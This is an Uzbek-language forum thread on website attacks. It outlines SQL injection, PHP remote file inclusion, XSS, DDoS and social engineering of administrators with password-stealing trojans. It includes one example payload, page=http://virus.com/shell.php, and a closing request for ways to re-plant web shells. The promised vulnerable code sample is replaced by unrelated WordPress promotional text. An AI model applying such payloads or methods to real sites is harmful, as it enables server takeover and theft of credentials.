Mavzu: Saytga hujumlar

22. Akbarali (2833) [off] | TXT | 27| 3 Jun 2017, 08:01 HonDa, ddosdan xafli narsalar bor

23. Usta (27) [off] | TXT | 27| 22 Sep 2017, 15:38 yuqoridagi link ka kiriib saytga vzlom qilib kirsa mb ketmaydimi? Aniqrog'

24. DreaMs_WorLD (137) [off] | TXT | 27| 22 Sep 2017, 16:08 Saytga hujimlarni
2 xil klasifikatsiyaga bo`lib olish mumkin...

1. Sayt yoki serverga hujim...
2. Sayt adminiga hujim...

Har ikki xolatdayam yomon amaki saytni qo`lga olishi mumkin... masalan ddos qilingan vaqtda back sectordan foydalangan xolatda saytning bosh sahifasiga xoxlagan so`z yoki html ko`d joylashtirish mumkin... yoki sql injection orqali saytdagi xar qande ma`lumotni o`zgartirish bazi hollarda shell kodini yuklab yuborish va uni xatolik bor sahifada ishga tushurish imkoni mavjud... php include (bu usul avvaldan sayt scriptida mavjud bo`lgan kod orqali ishga tushiriladi) wordpressda aynan shu kamchilik bo`lgan kamchilik quyidagicha ko`rinishda bo`lgan:

WordPress, Your Way

Build a site, sell online, earn with your content, and more

yomon amaki shu xatolikdan foydalanib qanaqadur bir usul bilan page=http://virus.com/shell.php faylini ishga tushirgan va sayt serveridagi barcha fayllar ustidan nazoratni ushlab turgan... keyingi usullardan biri bu xssdir xss qolgan usullarga nisbatan sal kamroq zarar keltiradi lekin bu usul bilan saytdagi xoxlagan foydalanuvchining profiliga kirish shaxsiy xabarlarini o`qish va hokazo ishlarni amalga oshirish mumkin...

2. Sayt adminiga hujim... Bu xolatda ko`proq Ijtimoiy muxandislik (Sotsialnaya Injeneriya) dan foydalaniladi... Natija saytning serveridan tortib sayt admini xaqidagi barcha ma`lumotlarga ega bo`lish mumkin...

25. DreaMs_WorLD (137) [off] | TXT | 27| 22 Sep 2017, 16:13 Xozirgi O`zbek lamerchalari hujim qilishning asosan 1 chi usulidan foydalaniladi... yani sayt yoki serverga hujim qilish... ayrim xollarda ushbu usul samara beradi ayrim xollarda yo`q... Sabab 1 usul xaqida uje ko`pchilikda tushuncha paydo bo`lgan va shu orqali ancha muncha master saytini ximoyalay oladi... lekin 2 usul bo`yicha xali juda ko`p masterlarda aniq va to`liq tushuncha yo`q... Shundan kelib chiqib 2 usul orqali O`zbek masterlarining deyarli barcha saytlarini buzsa bo`ladi degan bo`lardim...

26. DreaMs_WorLD (137) [off] | TXT | 27| 22 Sep 2017, 16:25 2 chi usul xaqida qisqacha tushuntiraman...
Hozirgi masterlarning ko`pi kompyuter yoki android&ios platformasidagi qurilmalardan foydalanib sayt yaratishadi... Bilamiz Internetda kompyuter qurilmalari uchun troyanskiy viruslar nixoyatda ko`p va bulardan samarali himoyalovchi Antiviruslarimiz ham o`z navbatida mavjud... lekin shu viruslarning alternativ versiyalari aynan mobil qurilmalar uchun ham tayyorlanganini kamchilik biladi... qaysidur bir forumda o`qigan edim... androidlar uchun viruslar yo`q deb... Kechiras shu joyida adashdiz... androidlar uchun ham viruslar yaratilgan va haligacha yaratilib kelmoqda... shu o`rinda erkanni bloklab qo`yadigon programma virus xisoblanmedi (qizlar_nomeri.apk ni nazarda tutdim...) Afsuski mobil qurilmalar uchun ESET Mobiledan boshqa antivirus dasturidan boshqa samarali dastur mavjud emas... (men ko`rgan dasturlar ichidan)... Lekin kamdan kam masterlar bu antivirusdan foydalanishadi... Viruslar va Antiviruslardan foydalanish xaqida gapirdik... Endi aynan Ijtimoiy muxandislik xaqida gapirmoqchiman... Ijtimoiy muxandislik bu ko`z bo`yamachilikdir... yani vzlom qilmoqchi bo`lgan adminni (jertva) aldov yo`li bilan o`z yo`liga yo`naltirish va o`ziga kerakli dastur yoki faylni ishga tushirishdir... natijada troyanskiy viruslar ishga tushadi va jertva xaqidagi barcha malumotlarni jumladan login parollarni ham yomon amakiga jo`natadi... jertva xozirgina saytini buzishganidan behabar internet tarmoqg`ini kavlab o`tiroradi... Mana shu ijtimoiy muxandislik diyiladi...

27. DreaMs_WorLD (137) [off] | TXT | 27| 22 Sep 2017, 16:31 Endi o`zimizni ximoya qilish xaqida to`xtalib o`taman...
Qiziquvchanlik insondagi eng ojiz nuqtadir... Agar kimnidur judayam qattiq odam o`ldirishga qiziqtirsenu lekin oxirida bu ish gunohligini aytsen ham u baribir shu ishni qiladi... chunki inson qiziquvchan bo`ladida...
PS: ximoyaning eng samarali yo`li aynan nimaga qiziqayotganingni faxmlab yetishdir!

28. UZBakadem (517) [off] | TXT | 27| 22 Sep 2017, 17:02 Saytni shel dirkalardan tozalab tashasa yana shel joylashtirsa buladimi boshqalar qanaqb joylashtiradi malumot aytsalaring kim bilsa